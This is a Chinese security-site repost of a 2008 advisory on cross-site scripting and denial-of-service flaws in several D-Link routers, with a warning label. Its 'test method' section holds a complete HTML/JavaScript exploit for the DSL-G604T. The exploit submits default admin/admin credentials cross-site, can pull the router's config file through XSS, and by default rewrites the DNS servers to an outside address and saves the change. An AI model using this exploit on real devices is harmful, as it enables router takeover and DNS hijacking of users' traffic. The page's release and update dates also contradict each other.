多个D-Link产品跨站脚本及拒绝服务漏洞-安全在线

多个D-Link产品跨站脚本及拒绝服务漏洞

作者：佚名来源：不详点击数：更新时间：2008年03月31日

发布日期：2008-12-07
更新日期：2008-03-26

受影响系统：

D-Link DI-604
D-Link DI-524
D-Link DSL-G604T

描述：

BUGTRAQ  ID: 28439
CVE(CAN) ID: CVE-2008-1266,CVE-2008-1253,CVE-2008-1258

D-Link是国际著名网络设备和解决方案提供商，产品包括多种路由器设备。

D-Link DI-524处理用户请求时存在多个漏洞，远程攻击者可能利用这些漏洞导致设备服务不可用或执行跨站脚本攻击。

D-Link DI-524路由器没有正确地处理发送给Web接口的登录请求，如果攻击者发送了超长用户名的话就会触发崩溃；如果发送了超长的HTTP头的话还可能导致路由器的WEB服务器崩溃。

D-Link DI-604路由器没有正确地过滤传送给prim.htm中rf参数的输入便返回给了用户，这可能导致在用户浏览器会话中执行任意HTML和脚本代码。

D-Link DSL-G604T路由器没有正确地过滤传送给cgi-bin/webcm中var:category参数的输入便返回给了用户，这可能导致在用户浏览器会话中执行任意HTML和脚本代码。

<*来源：Gareth Heyes
        laurent

  链接：http://secunia.com/advisories/29366/
        http://secunia.com/advisories/29531/
        http://secunia.com/advisories/29530/
        http://www.gnucitizen.org/projects/router-hacking-challenge/
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>
<head>
<title>DLink DSL-G604T Exploit</title>
<script>
function readConfig() {
    login();
    setTimeout(function() {
        xss('"><iframe src="http://192.168.1.1/cgi-bin/webcm?getpage=/etc/config.xml" onload="alert(this.contentWindow.document.body.innerHTML);">');
    }, 2000);
}
function xss(payload) {
    ifrm = document.getElementById('iframe');
    ifrm.contentWindow.location = 'http://192.168.1.1/cgi-bin/webcm?getpage=../html/advanced/portforw.htm&var:pagename=fwan&var:category='+payload;
}
function login() {
    var f = document.createElement('form');
    f.action = 'http://192.168.1.1/cgi-bin/webcm';
    f.innerHTML = '<input type="hidden" name="getpage" value="../html/home.htm"><input type="hidden" name="errorpage" value="../html/index.html">';
    f.innerHTML += '<input type="hidden" name="login:command/username" value="admin"><input type="hidden" name="login:command/password" value="admin">';
    f.innerHTML += '<input type="hidden" name="var:errormsg" value="Error">';
    f.target = 'iframe';
    f.method = 'post';
    document.body.appendChild(f);
    f.submit();
}
function post(url, fields) {
    var p = document.createElement('form');
    p.action = url;
    p.innerHTML = fields;
    p.target = 'iframe';
    p.method = 'post';
    document.body.appendChild(p);
    p.submit();
}
function changeDNS(server) {
    login();
    setTimeout(function() {
        var fields = '<input type="hidden" name="getpage" value="../html/setup/dns.htm">';
        fields += '<input type="hidden" name="resolver:settings/nameserver1" value="'+server+'">';
        fields += '<input type="hidden" name="resolver:settings/nameserver2" value="'+server+'">';
        fields += '<input type="hidden" name="dproxy:settings/state" value="2">';
        post('http://192.168.1.1/cgi-bin/webcm',fields);
    }, 2000);
    setTimeout(function() {
        post('http://192.168.1.1/cgi-bin/webcm','<input type="hidden" name="logic:command/save" value="../html/tools/syscommnd.htm">');
    },5000);
}
window.onload = function() {
    //readConfig();
    changeDNS('2.2.2.2');
}
</script>
</head>
<body>
<iframe name="iframe" id="iframe"></iframe>
</body>
</html>

建议：

厂商补丁：

D-Link
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.dlink.com/

更多技术文章和教程,请您进入安全在线论坛查看.BBS.AQZX.ORG

上一篇：ApacheAuthCAS Cookie远程SQL注入漏洞

下一篇：phpBB eXtreme Styles模块admin_xs.php本地文件包含漏洞

日历搜索

推荐栏目

Google Toolbar对话栏欺骗漏洞

微软发布12月份安全公告修复多个

MySQL服务器RENAME TABLE系统表格

5.17诺顿(Backdoor.Haxdoor)的误

Windows 2003 IIS6 .ASP目录执行

动易2006最新漏洞公告

PDF文件格式现漏洞用户电脑可被

WordPress wp-trackback.php漏洞

phpArticle2.06两个本地包含文件

phpcms 3.0.0文件上传漏洞

FreeBSD UFS文件系统本地整数溢出

热门栏目

动易2006最新漏洞公告

phpcms 3.0.0文件上传漏洞

Windows 2003 IIS6 .ASP目录执行

重庆电信开展IP地址反向解析阻止

PHP Easy Download file_infoadm

Windows Media Player ASX播放列

视频黑客盗取女子裸照敲诈勒索获

黑客远程登录盗取女子裸照进行敲

东昌中学一高考生遭遇电话黑客恶

网友评论：（只显示最新10条。评论内容只代表网友观点，与本站立场无关！）



请遵守《互联网电子公告服务管理规定》及中华人民共和国其他各项有关法律法规。严禁发表危害国家安全、损害国家利益、破坏民族团结、破坏国家宗教政策、破坏社会稳定、侮辱、诽谤、教唆、淫秽等内容的评论。用户需对自己在使用本站服务过程中的行为承担法律责任（直接或间接导致的）。本站管理员有权保留或删除评论内容。评论内容只代表网友个人观点，与本网站立场无关。